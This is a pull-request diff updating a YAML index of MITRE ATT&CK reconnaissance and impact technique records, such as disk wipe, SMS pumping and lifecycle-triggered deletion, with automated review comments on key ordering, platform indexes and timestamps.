- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1595.001:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--db8f5003-3b20-48f0-9b76-123e44208120
- type: attack-pattern
- created: '2020-10-02T16:54:23.193Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1595.001
- url: https://attack.mitre.org/techniques/T1595/001
- - source_name: Botnet Scan
- url: https://www.caida.org/publications/papers/2012/analysis_slash_zero/analysis_slash_zero.pdf
- description: Dainotti, A. et al. (2012). Analysis of a “/0” Stealth Scan from
- a Botnet. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T13:46:55.039Z'
name: Scanning IP Blocks
description: |-
Adversaries may scan victim IP blocks to gather information that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses.
@@ -56224,19 +56889,41 @@ reconnaissance:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: reconnaissance
+ x_mitre_contributors:
+ - Diego Sappa, Securonix
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor for suspicious network traffic that could be indicative of scanning, such as large quantities originating from a single source (especially if the source is known to be associated with an adversary/botnet).
Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - PRE
+ x_mitre_version: '1.1'
x_mitre_data_sources:
+ - 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Traffic Flow'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--db8f5003-3b20-48f0-9b76-123e44208120
+ created: '2020-10-02T16:54:23.193Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1595/001
+ external_id: T1595.001
+ - source_name: Botnet Scan
+ description: Dainotti, A. et al. (2012). Analysis of a “/0” Stealth Scan from
+ a Botnet. Retrieved October 20, 2020.
+ url: https://www.caida.org/publications/papers/2012/analysis_slash_zero/analysis_slash_zero.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1590.001:
technique:
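Review bot: T1595.001 gains the data source `'Network Traffic: Network Traffic Content'` alongside the bump to version 1.1 and a new contributor; if any index file in this PR is derived from `x_mitre_data_sources`, it should pick up that addition. Everything else in this hunk is key reordering (`id`, `created`, `created_by_ref`, `external_references`, `object_marking_refs` move from the top of the object to the bottom) with no content change, which is harmless for generated output but makes the real changes hard to spot; consider having the generator emit keys in a fixed order so future diffs stay small.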
@@ -56294,7 +56981,6 @@ reconnaissance:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1596.005:
technique:
@@ -56315,7 +57001,7 @@ reconnaissance:
- source_name: Shodan
url: https://shodan.io
description: Shodan. (n.d.). Shodan. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:49:49.260Z'
name: Scan Databases
description: |-
Adversaries may search within public scan databases for information about victims that can be used during targeting. Various online services continuously publish the results of Internet scans/surveys, often harvesting information such as active IP addresses, hostnames, open ports, certificates, and even server banners.(Citation: Shodan)
@@ -56331,8 +57017,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1591.001:
technique:
@@ -56358,7 +57042,7 @@ reconnaissance:
url: https://www.sec.gov/edgar/search-and-access
description: U.S. SEC. (n.d.). EDGAR - Search and Access. Retrieved August
27, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-08-27T15:37:09.025Z'
name: Determine Physical Locations
description: |-
Adversaries may gather the victim's physical location(s) that can be used during targeting. Information about physical locations of a target organization may include a variety of details, including where key resources and infrastructure are housed. Physical locations may also indicate what legal jurisdiction and/or authorities the victim operates within.
@@ -56374,8 +57058,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.1'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1598.001:
technique:
@@ -56399,7 +57081,7 @@ reconnaissance:
url: https://threatpost.com/facebook-launching-pad-phishing-attacks/160351/
description: 'O''Donnell, L. (2020, October 20). Facebook: A Top Launching
Pad For Phishing Attacks. Retrieved October 20, 2020.'
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:43:12.843Z'
name: Spearphishing Service
description: |-
Adversaries may send spearphishing messages via third-party services to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.
@@ -56421,13 +57103,11 @@ reconnaissance:
- 'Application Log: Application Log Content'
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Traffic Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
impact:
T1561.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:32:05.064Z'
name: Disk Structure Wipe
description: "Adversaries may corrupt or wipe the disk data structures on a
hard drive necessary to boot a system; targeting specific critical systems
@@ -56519,13 +57199,12 @@ impact:
url: https://www.symantec.com/connect/blogs/shamoon-attacks
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1498.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T15:54:49.943Z'
name: Direct Network Flood
description: |-
Adversaries may attempt to cause a denial of service (DoS) by directly sending a high-volume of network traffic to a target. This DoS attack may also reduce the availability and functionality of the targeted system(s) and network. [Direct Network Flood](https://attack.mitre.org/techniques/T1498/001)s are when one or more systems are used to send a high-volume of network packets towards the targeted service's network. Almost any network protocol may be used for flooding. Stateless protocols such as UDP or ICMP are commonly used but stateful protocols such as TCP can be used as well.
@@ -56534,7 +57213,6 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
- x_mitre_attack_spec_version: 2.1.0
x_mitre_deprecated: false
x_mitre_detection: 'Detection of a network flood can sometimes be achieved before
the traffic volume is sufficient to cause impact to the availability of the
@@ -56551,17 +57229,12 @@ impact:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- - SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- x_mitre_version: '1.3'
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
- 'Sensor Health: Host Status'
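Review bot: this hunk removes Azure AD, Office 365, SaaS and Google Workspace from T1498.001's `x_mitre_platforms` and bumps the version to 1.4. The platform index CSVs updated in this PR (google-workspace-index.csv among them) are keyed by platform, so confirm that no rows for T1498.001 remain in the Azure AD, Office 365, SaaS or Google Workspace indexes; with `atomic_tests: []` there are likely none, but the check is cheap.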
@@ -56586,7 +57259,8 @@ impact:
url: https://www.justice.gov/opa/pr/seven-iranians-working-islamic-revolutionary-guard-corps-affiliated-entities-charged
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1491.002:
technique:
@@ -56624,7 +57298,7 @@ impact:
description: 'Marco Balduzzi, Ryan Flores, Lion Gu, Federico Maggi, Vincenzo
Ciancaglini, Roel Reyes, Akira Urano. (n.d.). A Deep Dive into Defacement:
How Geopolitical Events Trigger Web Attacks. Retrieved April 19, 2019.'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-25T19:34:37.539Z'
name: External Defacement
description: 'An adversary may deface systems external to an organization in
an attempt to deliver messaging, intimidate, or otherwise mislead an organization
@@ -56658,12 +57332,10 @@ impact:
- 'Network Traffic: Network Traffic Content'
x_mitre_impact_type:
- Integrity
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1499.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:51.289Z'
name: OS Exhaustion Flood
description: |-
Adversaries may launch a denial of service (DoS) attack targeting an endpoint's operating system (OS). A system's OS is responsible for managing the finite resources as well as preventing the entire system from being overwhelmed by excessive demands on its capacity. These attacks do not need to exhaust the actual resources on a system; the attacks may simply exhaust the limits and available resources that an OS self-imposes.
@@ -56728,42 +57400,127 @@ impact:
url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
atomic_tests: []
- T1499.003:
+ T1485.001:
technique:
- x_mitre_platforms:
- - Windows
- - Azure AD
- - Office 365
- - SaaS
- - IaaS
- - Linux
- - macOS
- - Google Workspace
+ modified: '2024-10-16T21:27:02.481Z'
+ name: Lifecycle-Triggered Deletion
+ description: "Adversaries may modify the lifecycle policies of a cloud storage
+ bucket to destroy all objects stored within. \n\nCloud storage buckets often
+ allow users to set lifecycle policies to automate the migration, archival,
+ or deletion of objects after a set period of time.(Citation: AWS Storage Lifecycles)(Citation:
+ GCP Storage Lifecycles)(Citation: Azure Storage Lifecycles) If a threat actor
+ has sufficient permissions to modify these policies, they may be able to delete
+ all objects at once. \n\nFor example, in AWS environments, an adversary with
+ the `PutLifecycleConfiguration` permission may use the `PutBucketLifecycle`
+ API call to apply a lifecycle policy to an S3 bucket that deletes all objects
+ in the bucket after one day.(Citation: Palo Alto Cloud Ransomware) In addition
+ to destroying data for purposes of extortion and [Financial Theft](https://attack.mitre.org/techniques/T1657),
+ adversaries may also perform this action on buckets storing cloud logs for
+ [Indicator Removal](https://attack.mitre.org/techniques/T1070).(Citation:
+ Datadog S3 Lifecycle CloudTrail Logs)"
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: impact
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - IaaS
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Cloud Storage: Cloud Storage Modification'
+ x_mitre_impact_type:
+ - Availability
+ type: attack-pattern
+ id: attack-pattern--1001e0d6-ee09-4dfc-aa90-e9320ffc8fe4
+ created: '2024-09-25T13:16:14.166Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1485/001
+ external_id: T1485.001
+ - source_name: AWS Storage Lifecycles
+ description: AWS. (n.d.). Managing the lifecycle of objects. Retrieved September
+ 25, 2024.
+ url: https://docs.aws.amazon.com/AmazonS3/latest/userguide/object-lifecycle-mgmt.html
+ - source_name: GCP Storage Lifecycles
+ description: Google Cloud. (n.d.). Object Lifecycle Management. Retrieved
+ September 25, 2024.
+ url: https://cloud.google.com/storage/docs/lifecycle
+ - source_name: Azure Storage Lifecycles
+ description: Microsoft Azure. (2024, July 3). Configure a lifecycle management
+ policy. Retrieved September 25, 2024.
+ url: https://learn.microsoft.com/en-us/azure/storage/blobs/lifecycle-management-policy-configure?tabs=azure-portal
+ - source_name: Palo Alto Cloud Ransomware
+ description: 'Ofir Balassiano and Ofir Shaty. (2023, November 29). Ransomware
+ in the Cloud: Breaking Down the Attack Vectors. Retrieved September 25,
+ 2024.'
+ url: https://www.paloaltonetworks.com/blog/prisma-cloud/ransomware-data-protection-cloud/
+ - source_name: Datadog S3 Lifecycle CloudTrail Logs
+ description: Stratus Red Team. (n.d.). CloudTrail Logs Impairment Through
+ S3 Lifecycle Rule. Retrieved September 25, 2024.
+ url: https://stratus-red-team.cloud/attack-techniques/AWS/aws.defense-evasion.cloudtrail-lifecycle-rule/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--18cffc21-3260-437e-80e4-4ab8bf2ba5e9
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1496.003:
+ technique:
+ modified: '2024-10-16T17:45:14.210Z'
+ name: SMS Pumping
+ description: |-
+ Adversaries may leverage messaging services for SMS pumping, which may impact system and/or hosted service availability.(Citation: Twilio SMS Pumping) SMS pumping is a type of telecommunications fraud whereby a threat actor first obtains a set of phone numbers from a telecommunications provider, then leverages a victim’s messaging infrastructure to send large amounts of SMS messages to numbers in that set. By generating SMS traffic to their phone number set, a threat actor may earn payments from the telecommunications provider.(Citation: Twilio SMS Pumping Fraud)
+
+ Threat actors often use publicly available web forms, such as one-time password (OTP) or account verification fields, in order to generate SMS traffic. These fields may leverage services such as Twilio, AWS SNS, and Amazon Cognito in the background.(Citation: Twilio SMS Pumping)(Citation: AWS RE:Inforce Threat Detection 2024) In response to the large quantity of requests, SMS costs may increase and communication channels may become overwhelmed.(Citation: Twilio SMS Pumping)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: impact
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - SaaS
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Application Log: Application Log Content'
+ x_mitre_impact_type:
+ - Availability
type: attack-pattern
- created: '2020-02-20T15:35:00.025Z'
+ id: attack-pattern--130d4494-b2d6-4040-bcea-6e59f05222fe
+ created: '2024-09-25T13:53:19.586Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1499.003
- url: https://attack.mitre.org/techniques/T1499/003
- - source_name: Arbor AnnualDoSreport Jan 2018
- url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
- description: Philippe Alcoy, Steinthor Bjarnason, Paul Bowen, C.F. Chui, Kirill
- Kasavchnko, and Gary Sockrider of Netscout Arbor. (2018, January). Insight
- into the Global Threat Landscape - Netscout Arbor's 13th Annual Worldwide
- Infrastructure Security Report. Retrieved April 22, 2019.
- - source_name: Cisco DoSdetectNetflow
- url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
- description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
- Retrieved April 25, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ url: https://attack.mitre.org/techniques/T1496/003
+ external_id: T1496.003
+ - source_name: AWS RE:Inforce Threat Detection 2024
+ description: Ben Fletcher and Steve de Vera. (2024, June). New tactics and
+ techniques for proactive threat detection. Retrieved September 25, 2024.
+ url: https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf
+ - source_name: Twilio SMS Pumping
+ description: Twilio. (2024, April 10). What Is SMS Pumping Fraud and How to
+ Stop It. Retrieved September 25, 2024.
+ url: https://www.twilio.com/en-us/blog/sms-pumping-fraud-solutions
+ - source_name: Twilio SMS Pumping Fraud
+ description: Twilio. (n.d.). What is SMS Pumping Fraud?. Retrieved September
+ 25, 2024.
+ url: https://www.twilio.com/docs/glossary/what-is-sms-pumping-fraud
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1499.003:
+ technique:
+ modified: '2024-10-15T15:41:49.168Z'
name: Application Exhaustion Flood
description: 'Adversaries may target resource intensive features of applications
to cause a denial of service (DoS), denying availability to those applications.
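Review bot: the removals of the old T1499.003 header fields (`external_references`, the Arbor and Cisco citations, `modified: '2022-05-11T14:00:00.188Z'`) are interleaved with the tail of the new T1496.003 record (`external_id: T1496.003`, the AWS RE:Inforce and Twilio SMS Pumping references, `atomic_tests: []`), so at a glance the hunk reads as if T1499.003 had acquired Twilio citations. The name and description of the new T1496.003 entry are not in this hunk; please confirm the entry is complete in the file and that its references belong to it rather than to T1499.003. A stable key order in the generator would keep future regenerations from producing this kind of cross-record interleaving.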
@@ -56774,13 +57531,20 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
+ x_mitre_deprecated: false
x_mitre_detection: |-
Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.
In addition to network level detections, endpoint logging and instrumentation can be useful for detection. Attacks targeting web applications may generate logs in the web server, application server, and/or database server that can be used to identify the type of attack, possibly before the impact is felt.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.2'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - IaaS
+ - Linux
+ - macOS
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Traffic Content'
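Review bot: `x_mitre_modified_by_ref` is removed from T1499.003 in this hunk while `x_mitre_platforms` (Windows, IaaS, Linux, macOS), `x_mitre_domains` and `x_mitre_deprecated` are introduced and the version goes 1.2 → 1.3; the removed key is re-added at the bottom of the record in the next hunk, so this is a move, not a deletion. Worth a check across the whole diff that every record which loses `x_mitre_modified_by_ref` in an early hunk regains it later, since a missed re-add is invisible in a per-hunk read.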
@@ -56788,12 +57552,33 @@ impact:
- 'Application Log: Application Log Content'
x_mitre_impact_type:
- Availability
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--18cffc21-3260-437e-80e4-4ab8bf2ba5e9
+ created: '2020-02-20T15:35:00.025Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1499/003
+ external_id: T1499.003
+ - source_name: Cisco DoSdetectNetflow
+ description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
+ Retrieved April 25, 2019.
+ url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
+ - source_name: Arbor AnnualDoSreport Jan 2018
+ description: Philippe Alcoy, Steinthor Bjarnason, Paul Bowen, C.F. Chui, Kirill
+ Kasavchnko, and Gary Sockrider of Netscout Arbor. (2018, January). Insight
+ into the Global Threat Landscape - Netscout Arbor's 13th Annual Worldwide
+ Infrastructure Security Report. Retrieved April 22, 2019.
+ url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1561:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-20T18:16:41.942Z'
name: Disk Wipe
description: |-
Adversaries may wipe or corrupt raw disk data on specific systems or in large numbers in a network to interrupt availability to system and network resources. With direct write access to a disk, adversaries may attempt to overwrite portions of disk data. Adversaries may opt to wipe arbitrary portions of disk data and/or wipe disk structures like the master boot record (MBR). A complete wipe of all disk sectors may be attempted.
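Review bot: the T1561 `modified` timestamp moves backwards, from 2023-05-09T14:00:00.188Z to 2023-04-20T18:16:41.942Z. The removed value shares its `T14:00:00.188Z` suffix with other removed `modified` values in this diff (2022-05-11T14:00:00.188Z, 2022-11-08T14:00:00.188Z), which looks like a batch stamp from an earlier index build rather than an upstream edit time; if the new values are the per-object timestamps from the ATT&CK STIX data that is an improvement, but it should be stated in the PR description so the apparent regression is not flagged by anyone diffing timestamps. Also, `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` are dropped for T1499.003 and only `x_mitre_attack_spec_version: 3.2.0` is re-added; any consumer that reads `spec_version` will need updating.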
@@ -56854,109 +57639,79 @@ impact:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1565.001:
technique:
+ modified: '2024-08-26T16:33:33.982Z'
+ name: Stored Data Manipulation
+ description: |-
+ Adversaries may insert, delete, or manipulate data at rest in order to influence external outcomes or hide activity, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating stored data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
+
+ Stored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The type of modification and the impact it will have depends on the type of data as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: impact
+ x_mitre_deprecated: false
+ x_mitre_detection: Where applicable, inspect important file hashes, locations,
+ and modifications for suspicious/unexpected values.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
x_mitre_platforms:
- Linux
- macOS
- Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_version: '1.1'
+ x_mitre_data_sources:
+ - 'File: File Modification'
+ - 'File: File Creation'
+ - 'File: File Deletion'
+ x_mitre_impact_type:
+ - Integrity
type: attack-pattern
id: attack-pattern--1cfcb312-b8d7-47a4-b560-4b16cc677292
created: '2020-03-02T14:22:24.410Z'
- x_mitre_version: '1.1'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1565.001
url: https://attack.mitre.org/techniques/T1565/001
+ external_id: T1565.001
- source_name: DOJ Lazarus Sony 2018
- url: https://www.justice.gov/opa/press-release/file/1092091/download
description: Department of Justice. (2018, September 6). Criminal Complaint
- United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
+ url: https://www.justice.gov/opa/press-release/file/1092091/download
- source_name: FireEye APT38 Oct 2018
- url: https://content.fireeye.com/apt/rpt-apt38
description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
November 6, 2018.'
- x_mitre_deprecated: false
- revoked: false
- description: |-
- Adversaries may insert, delete, or manipulate data at rest in order to influence external outcomes or hide activity, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating stored data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
-
- Stored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The type of modification and the impact it will have depends on the type of data as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Stored Data Manipulation
- x_mitre_detection: Where applicable, inspect important file hashes, locations,
- and modifications for suspicious/unexpected values.
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: impact
- x_mitre_is_subtechnique: true
- x_mitre_data_sources:
- - 'File: File Modification'
- - 'File: File Creation'
- - 'File: File Deletion'
- x_mitre_impact_type:
- - Integrity
- x_mitre_attack_spec_version: 2.1.0
+ url: https://www.mandiant.com/sites/default/files/2021-09/rpt-apt38-2018-web_v5-1.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1489:
technique:
- x_mitre_platforms:
- - Windows
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- id: attack-pattern--20fb2507-d71c-455d-9b6d-6104461cf26b
- created: '2019-03-29T19:00:55.901Z'
- x_mitre_version: '1.2'
- external_references:
- - source_name: mitre-attack
- external_id: T1489
- url: https://attack.mitre.org/techniques/T1489
- - source_name: SecureWorks WannaCry Analysis
- url: https://www.secureworks.com/research/wcry-ransomware-analysis
- description: Counter Threat Unit Research Team. (2017, May 18). WCry Ransomware
- Analysis. Retrieved March 26, 2019.
- - source_name: Talos Olympic Destroyer 2018
- url: https://blog.talosintelligence.com/2018/02/olympic-destroyer.html
- description: Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer
- Takes Aim At Winter Olympics. Retrieved March 14, 2019.
- - source_name: Novetta Blockbuster
- url: https://web.archive.org/web/20160226161828/https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf
- description: 'Novetta Threat Research Group. (2016, February 24). Operation
- Blockbuster: Unraveling the Long Thread of the Sony Attack. Retrieved February
- 25, 2016.'
- x_mitre_deprecated: false
- revoked: false
+ modified: '2024-10-12T15:57:27.380Z'
+ name: Service Stop
description: "Adversaries may stop or disable services on a system to render
those services unavailable to legitimate users. Stopping critical services
or processes can inhibit or stop response to an incident or aid in the adversary's
overall objectives to cause damage to the environment.(Citation: Talos Olympic
Destroyer 2018)(Citation: Novetta Blockbuster) \n\nAdversaries may accomplish
this by disabling individual services of high importance to an organization,
- such as MSExchangeIS
, which will make Exchange content inaccessible
- (Citation: Novetta Blockbuster). In some cases, adversaries may stop or disable
- many or all services to render systems unusable.(Citation: Talos Olympic Destroyer
+ such as MSExchangeIS
, which will make Exchange content inaccessible.(Citation:
+ Novetta Blockbuster) In some cases, adversaries may stop or disable many or
+ all services to render systems unusable.(Citation: Talos Olympic Destroyer
2018) Services or processes may not allow for modification of their data stores
while running. Adversaries may stop services or processes in order to conduct
[Data Destruction](https://attack.mitre.org/techniques/T1485) or [Data Encrypted
for Impact](https://attack.mitre.org/techniques/T1486) on the data stores
of services like Exchange and SQL Server.(Citation: SecureWorks WannaCry Analysis)"
- modified: '2022-11-08T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Service Stop
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: impact
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor processes and command-line arguments to see if critical processes are terminated or stop running.
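Review bot: the `FireEye APT38 Oct 2018` reference URL for T1565.001 changes from https://content.fireeye.com/apt/rpt-apt38 to the mandiant.com PDF; the same reference is also used by T1565.003 later in this diff, so the two should end up identical (they do here). Separately, the T1489 description is broken mid-sentence on both sides of the change (`such as MSExchangeIS` on one line, `, which will make Exchange content inaccessible` on the next), with the only textual change being the relocation of the `(Citation: Novetta Blockbuster)` marker and its period; the same break appears after `ChangeServiceConfigW` in the detection text of the next hunk. A line break immediately after an identifier is unusual for a wrapped YAML scalar, so please confirm the description renders correctly from the source rather than judging it from the diff.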
@@ -56965,10 +57720,14 @@ impact:
Alterations to the service binary path or the service startup type changed to disabled may be suspicious.
Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. For example, ChangeServiceConfigW
may be used by an adversary to prevent services from starting.(Citation: Talos Olympic Destroyer 2018)
- kill_chain_phases:
- - kill_chain_name: mitre-attack
